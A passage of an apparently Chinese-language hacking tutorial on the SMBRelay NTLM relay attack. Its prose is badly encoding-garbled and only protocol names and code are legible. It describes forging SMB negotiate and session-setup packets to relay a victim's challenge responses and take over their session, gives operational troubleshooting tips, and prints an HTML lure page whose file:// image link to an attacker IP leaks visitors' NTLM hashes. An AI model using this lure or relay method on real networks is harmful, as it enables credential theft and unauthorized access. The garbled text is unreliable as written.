"NT LM 0.12" dialect¡£ÔÚÓû§¼¶¹²Ïí(ÓëÖ®Ïà¶ÔµÄÊǹ²Ïí¼¶¹²Ïí)ÖÐ"NT LM 0.12"ÊÇÊ×Ñ¡SMB dialect¡£
´ÓÕâÀ↑ʼ£¬³öÏÖÏÂÃæÈý×é¶Ô»°
µÚÒ»×é249----->212
      154----->249

µÚ¶þ×é249----->212
      154----->249

µÚÈý×é249----->154
      212----->249
ÎÒÖ®ËùÒÔÕâô·Ö×飬ÊÇÓÉÓÚËûÃÇÁ½Á½½»Á÷µÄÊý¾ÝÄÚÈÝÍêȫһÖ£¬ÉÏÃæËµ¹ý£¬212Óë154µÄÊý¾Ý½»Á÷ÎÞ·¨²¶×½µ½
µ«ÔÚÕâÀïºÜÈÝÒ׵ĿÉÒÔÏëÏóµ½£¬Êµ¼ÊÉÏ£¬212³Ðµ£ÁËÖÐתÊý¾ÝµÄÈÎÎñ
ÊÂʵÉÏ£¬Êý¾Ý½»»»µÄÁ÷³ÌÓ¦¸ÃÕâÑù:249--->212--->154--->249
µ½ÁËÕâÀ212ÍêÈ«ÕÆÎÕÁËËùÓлỰ£¬Ãô¸Ð×ÊÁÏÈ«²¿»ñÈ¡£¬½ÓÏÂÀ´£¬ÀûÓÃSMBÖØ¶¨Ïò£¬212¾ÍÎÞÐëÃÜÂ룬
Ö±½Ó¿ÉÒÔ¶Ô249ΪËùÓûΪÁË

ÏÂÃæÎÒÃÇÏêϸ·ÖÎöÒ»ÏÂÀïÃæÆÛÆ­¹ý³Ì¡£´ÓÉÏÃæµÄÊý¾Ý°üÖпÉÒÔ¿´¼û
µ±249ÊÔͼÁ¬½Ó154ʱ£¬»á½¨Á¢NBT»á»°²¢·¢ËÍSMB_COM_NEGOTIATE(0x72)ÇëÇó±¨ÎÄ£¬
¾Ídialect½øÐÐЭÉÌ¡£Ò»°ã×îÖÕЭÉ̽á¹û¶¼ÊÇʹÓÃ"NT LM 0.12" dialect¡£
212×¢Òâµ½Õâ¸öЭÉÌÇëÇó£¬ÓÚÊÇαװ³É154Ïò249·¢ËÍÏìÓ¦±¨ÎÄ£¬encryption key×Ö¶ÎÖÐ
ÉèÖóÉ֮ǰ±£´æÏÂÀ´µÄÌôÕ½¡£Õâ¸öÏìÓ¦±¨ÎĵÄÔ´IPÉèÖóÉ154µÄIPµØÖ·£¬ÐèÒª·ÖÎö249ËÍÍù154µÄSMB_COM_NEGOTIATE(0x72)ÇëÇó±¨ÎÄÒÔÉèÖÃÏìÓ¦±¨ÎĵÄth_ack×ֶΡ£212±¾À´¾Í°çÑÝ×Å249Óë1
54Ö®¼ä·ÓÉÆ÷Ò»ÀàµÄ½ÇÉ«¡£À´×Ô154µÄÕý³£ÏìÓ¦±¨ÎÄ×öÎªÖØ¸´Êý¾Ý¶ø±»¶ªÆú¡£´Ëʱ249Éú³ÉÁ½×é
24×Ö½ÚÏìÓ¦£¬Ïò154·¢ËÍSMB_COM_SESSION_SETUP_ANDX(0x73)ÇëÇó±¨ÎÄ¡£212×¢Òâµ½Õâ¸öÇëÇ󣬻ñ
È¡ÁË249Éú³ÉµÄÁ½×é24×Ö½ÚÏìÓ¦£¬È»ºó212Ò²¹¹ÔìÒ»¸öSMB_COM_SESSION_SETUP_ANDX(0x73)ÇëÇó±¨ÎÄ£¬
ÓÃÕâÁ½×é24×Ö½ÚÏìÓ¦·Ö±ðÉèÖÃCaseInsensitivePassword¡¢CaseSensitivePassword×ֶΡ£
ͬʱÔÚAccountName×Ö¶ÎÉèÖÃ249µÄÓû§Ãû¡£212½«ÕâÑùÒ»¸öαÔìµÄ0x73ÇëÇó±¨ÎÄͨ¹ý×î³õ
½¨Á¢µÄNBT»á»°·¢Íù154¡£ÖÁ´Ë212½«»ñȡһÌõµ½154µÄSMB»á»°£¬ÓµÓÐ249Óû§µÄȨÏÞ¡£
×îºóSMBRELAY½«154µÄ139¶Ë¿ÚÖØ¶¨Ïò249£¬ÎÒÃǾÍÄÜÖ±½Ó·ÃÎÊ249ÁË

ʵ¼Ê²Ù×÷ÖпÉÄܳöÏÖµÄÎÊÌ⣺
1£ºÍø¿¨Ö¸¶¨Ò»¶¨²»ÄÜ´í£¬·ñÔò¾Í¿ÉÄÜ»áÓöµ½ERROR¡£¡£¡£¡£Á¬×î»ù±¾µÄHASH¶¼×¥²»µ½¡£
2£ºÒ»°ãÈç¹û×ÜÊDz»Äܳɹ¦µÄ»°£¬½¨Ò黹ÊǽèÖúµÚ3·½»úÆ÷¡£
3£º¾Ý˵µçÐÅÓû§¿ÉÄÜ»áÓеãÂé·³£¬²»¹ýCZYºÃÏóÒ²³É¹¦ÁË¡£ÎÒûÊÔ¹ý
4£ºÓÐЩÈË¿ÉÄÜHASHÄÜץȡ£¬¿ÉÊÇÁ¬½Óʱ»á±¨´í£¬Õâʱºò¿ÉÄÜÊÇPROXY»úÆ÷³öµÄÎÊÌ⣬¾ßÌåÄÄÒ»²½
   ¾ßÌåÇé¿ö¾ßÌå·ÖÎö£º£©
5£º²»ÊÇ˵Äܹ»ÕýÈ·°ó¶¨¾ÍÄܹ»ÕýÈ·µÄ½ÓÊÕÁ¬½ÓÐÅÏ¢¡£µ±SMBRelay°ó¶¨139¶Ë¿Úʱ£¬Èç¹ûϵͳ´æÔÚÈκεÄ139¶Ë¿Ú   µÄÁ¬½Ó£¨°üÀ¨TIME_WAIT״̬µÄ£©£¬Ëü½«ºÜÓпÉÄܲ»Äܹ»Õý³£¹¤×÷¡£½¨Òé¶à°ó¶¨¼¸¸ö£¬ÒÔÔö¼ÓµÃµ½ÐÅÏ¢µÄ¿É     ÄÜÔÚÔÚWindows 2000Ï£¬Èç¹ûϵͳÕýÔÚʹÓý«²»ÔÊÐíSMBRelayµÄ°óÈë¡£
6£º·ÇÒâÁÏʼþ£¬±ÈÈçÍøÂçºÜ»µµÄʱºò£¬¿ÉÄܰëÌì×¥²»µ½£¬»òÕßË÷ÐÔ±¨´í£¨½ÌÓýÍøÖÊÁ¿ÊµÔÚ²»Îȶ¨£©¡£
   Èç¹ûÅÜSMBRELAYµÄ»úÆ÷¸ººÉºÜ´óʱ£¬¿ÉÄÜÁ¬½ÓʱҲ»á±¨´í¡£×î¿É¶ñµÄ¾ÍÊÇÈç¹ûÕâʱºòÓÐÈËɨÃèSMB SERVER£¬
   Èç¹û²»ÖØÆô¶¯SMBRELAY£¬ÏÂÃæ¿ÉÄÜʲôÊÂÇé¶¼×ö²»ÁËÁË
7£ºÈçºÎÒýÓÕ±ðÈËÉϹ³£º
   ¹¹ÔìÒ»¸öÈçϵÄÍøÒ³
   <html>
   <title>±¾ÍøÒ³¿ÉÒÔץȡÄãµÄHASH</title>
   <p><p align=center>
   <img src="file://ÏÝÚåIP/C$/A.JPG">            /*±ÈÈçÉÏÃæµÄÀý×ÓÖУ¬ÏÝÚåIPÊÇ11.197.248.154*/
   </body>
   </html>

Èç¹ûÄãÏëÁ˽âÆäÖиü¶àµÄϸ½Ú£¬±ÈÈç¿ÚÁî¼ÓÃܼ¼Êõ£¬SMBRELAYµÄ¹¤×÷´úÂ룬Äã¿ÉÒÔ²éÔÄÏÂÃæÁгöµÄ²Î¿¼×ÊÁÏ

²Î¿¼×ÊÁÏ£º
ÂÌÃËÔ¿¯37ÆÚSMBϵÁÐ(5)--LM/NTLMÑéÖ¤»úÖÆ£¬×÷ÕߣºÐ¡ËÄ <scz@nsfocus.com>
SMB/CIFS BY THE ROOT(Phrack60-0x0b)
http://www.ph4nt0m.net/bbs/dispbbs.asp?boardID=22&RootID=24519&ID=24519&page=2·­Ò룺MIX
SMBRELAYµÄÔ´´úÂëÏÂÔØ£ºsmbrelay.cpp
EÎÄ˵Ã÷Îļþ£ºsmbrelay.html